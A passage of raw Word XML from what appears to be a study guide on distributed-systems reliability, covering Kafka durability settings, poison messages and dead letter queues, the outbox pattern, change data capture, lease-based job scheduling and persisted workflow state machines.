      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CB858" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Producer: acks=all (wait for all ISR replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08D6F2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Broker: min.insync.replicas=2 (at least 2 replicas must confirm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012AC6A1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Broker: unclean.leader.election.enable=false (never elect a lagging replica as leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112B141" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What can still go wrong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526EF3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If ALL replicas in the ISR die simultaneously (correlated failure) → messages on disk survive if disks survive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B500A7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If disks fail (fire, flood) → data lost. Mitigate with cross-datacenter replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6EC6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Poison Messages (Messages That Can Never Be Processed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108B855" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769491A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A malformed message enters the queue. Consumer attempts to process it → crashes. Message is re-delivered. Consumer crashes again. Infinite loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3DE53" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How this kills reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594F456" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>The queue backs up (one message blocks all subsequent messages in that partition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E6D71" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consumer continuously restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D697EF7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>All messages behind the poison message are delayed indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73388765" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF1A56" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry count tracking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> After N failed attempts, move to a Dead Letter Queue (DLQ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A923DC5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLQ monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Alert on DLQ depth. Manual inspection and reprocessing or discarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275870F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Schema validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Reject invalid messages at the producer level before they enter the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F217F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="509"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defensive deserialization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Consumer handles malformed messages gracefully (log, skip, DLQ) rather than crashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CF6C1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="746D1DE4">
          <v:rect id="_x0000_i2945" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE3162B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Reliability Patterns for Distributed Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6311C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 The Outbox Pattern — Reliable Event Publishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826CF91" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5EA0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A service needs to: (1) update its database, AND (2) publish an event to a message broker. These are two separate systems — if the service crashes between the two operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C210901" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>DB updated but event not published → downstream systems are never notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63571D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Event published but DB not updated → downstream acts on something that didn't happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7011AECD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Outbox pattern solves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BE24F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Within a SINGLE database transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5EA02" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Update the business table (e.g., INSERT INTO orders ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F2B8F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Insert the event into an outbox table (e.g., INSERT INTO outbox (event_type, payload) ...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B70F2C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Transaction commits atomically — both happen or neither.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDFF80" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>A separate process (relay/poller) reads the outbox table and publishes events to the message broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF965C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>After successful publish, marks the outbox entry as published.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC81E7C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54467DCC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The database transaction ensures atomicity (state change + event recording happen together).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54D39A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The relay process handles eventual delivery to the broker (with retries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468246" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the relay crashes and restarts, it re-reads unpublished outbox entries and retries (at-least-once, combined with consumer idempotency = effectively exactly-once).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000B4A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alternative: CDC (Change Data Capture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E98B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Instead of an explicit outbox table, use the database's transaction log (WAL/binlog) as the event source:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4C972" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A CDC connector (Debezium) reads the WAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440E770" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every committed change automatically becomes an event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBA966" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Published to Kafka with exactly the same ordering as the transaction log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E959B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage over outbox:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> No schema changes needed. Every table change is automatically captured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE3632" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Reliable Scheduling — At-Least-Once Job Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED202AA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD202E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Schedule a job for "5 minutes from now" (e.g., send reminder email after sign-up). The scheduler crashes. Is the job lost?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788582F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliable implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ABC3E3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Write the job to a durable store (database) with execution timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86B9E0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A poller reads jobs where execution_time &lt;= NOW() and status = PENDING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17959B1F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Claims the job (sets status = PROCESSING with a lease/lock timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CB872" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Executes the job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ECD27F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If successful: marks status = COMPLETED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725406E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>If the processor crashes: the lease expires → job goes back to PENDING → another worker picks it up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C990783" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key reliability properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1E65C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Jobs survive crashes (in the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF32FB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At-least-once:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If a processor fails, the job is retried.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43C609" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotent execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The job itself must be idempotent (sending the same email twice is bad → use a deduplication check).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691134F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visibility timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The lease ensures two processors don't work on the same job simultaneously (unless one is suspected dead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429BE92" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 Reliable State Machines — Making Workflows Crash-Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080D4E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973C6E1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Model complex multi-step operations as an explicit state machine, persisted in a database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A18B56" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B6E22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Order: CREATED → PAYMENT_PENDING → PAYMENT_CONFIRMED → SHIPPING → DELIVERED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CECFC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">                                   ↘ PAYMENT_FAILED → CANCELLED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC6931" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is reliable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC815A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>After a crash, you read the current state from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B199C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You know exactly where you were and what to do next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E824D30" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each state transition is a database write (durable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D82146" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Recovery is deterministic: "state is PAYMENT_PENDING → retry payment check."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69815790" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without an explicit state machine:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> After a crash, you'd need complex logic to figure out "what happened?" by querying multiple systems. Fragile and error-prone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2209270D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1920B575">
          <v:rect id="_x0000_i2946" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="542BDB3D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
